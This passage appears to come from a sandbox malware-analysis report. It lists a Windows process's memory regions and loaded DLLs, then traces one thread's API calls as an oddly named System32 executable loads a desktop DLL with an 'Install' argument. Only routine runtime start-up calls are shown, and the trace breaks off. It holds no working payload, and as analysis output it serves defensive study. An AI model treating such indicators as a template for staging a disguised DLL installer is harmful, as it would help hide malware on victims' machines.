(normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1329 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1330 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1331 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1332 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1333 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1334 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1335 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1336 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1337 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1338 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1339 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1340 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1341 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1342 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1343 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1344 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1345 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1346 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1347 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1348 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1349 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1350 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1351 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Thread: id = 62 os_tid = 0xba4 [0032.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf8ac | out: lpSystemTimeAsFileTime=0x1cf8ac*(dwLowDateTime=0xe153e070, dwHighDateTime=0x1d3dfba)) [0032.885] GetCurrentProcessId () returned 0xba0 [0032.885] GetCurrentThreadId () returned 0xba4 [0032.885] GetTickCount () returned 0x17609 [0032.885] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf8a4 | out: lpPerformanceCount=0x1cf8a4*=365387596) returned 1 [0032.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.886] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.886] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.886] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.886] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.886] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.887] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.887] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.887] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.887] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.887] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.887] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.888] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.888] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.888] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.888] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.888] GetCurrentThreadId () returned 0xba4 [0032.888] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"Install\"" [0032.888] GetEnvironmentStringsW () returned 0x387900* [0032.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x2d09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.889] FreeEnvironmentStringsW (penv=0x387900) returned 1 [0032.889] GetStartupInfoA (in: lpStartupInfo=0x1cf7fc | out: lpStartupInfo=0x1cf7fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.889] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.889] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.889] SetHandleCount (uNumber=0x20) returned 0x20 [0032.889] GetLastError () returned 0x0 [0032.889] SetLastError (dwErrCode=0x0) [0032.889] GetLastError () returned 0x0 [0032.889] SetLastError (dwErrCode=0x0) [0032.889] GetLastError () returned 0x0 [0032.889] SetLastError (dwErrCode=0x0) [0032.889] GetACP () returned 0x4e4 [0032.889] GetLastError () returned 0x0 [0032.889] SetLastError (dwErrCode=0x0) [0032.889] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.889] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf7dc | out: lpCPInfo=0x1cf7dc) returned 1 [0032.889] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf2a8 | out: lpCPInfo=0x1cf2a8) returned 1 [0032.889] GetLastError () returned 0x0 [0032.889] SetLastError (dwErrCode=0x0) [0032.890] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1cf238 | out: lpCharType=0x1cf238) returned 1 [0032.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf6bc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf6bc, cbMultiByte=256, lpWideCharStr=0x1cf028, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0032.890] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1cf2bc | out: lpCharType=0x1cf2bc) returned 1 [0032.890] GetLastError () returned 0x0 [0032.890] SetLastError (dwErrCode=0x0) [0032.890] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf6bc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf6bc, cbMultiByte=256, lpWideCharStr=0x1ceff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.890] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.890] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cede8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1cf5bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿË\x89Oôô÷\x1c", lpUsedDefaultChar=0x0) returned 256 [0032.890] GetLastError () returned 0x0 [0032.890] SetLastError (dwErrCode=0x0) [0032.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf6bc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf6bc, cbMultiByte=256, lpWideCharStr=0x1cf018, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.890] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.890] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cee08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1cf4bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿË\x89Oôô÷\x1c", lpUsedDefaultChar=0x0) returned 256 [0032.890] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.890] GetLastError () returned 0x0 [0032.890] SetLastError (dwErrCode=0x0) [0032.890] GetLastError () returned 0x0 [0032.890] SetLastError (dwErrCode=0x0) [0032.890] GetLastError () returned 0x0 [0032.890] SetLastError (dwErrCode=0x0) [0032.890] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.891] SetLastError (dwErrCode=0x0) [0032.891] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] SetLastError (dwErrCode=0x0) [0032.892] GetLastError () returned 0x0 [0032.892] 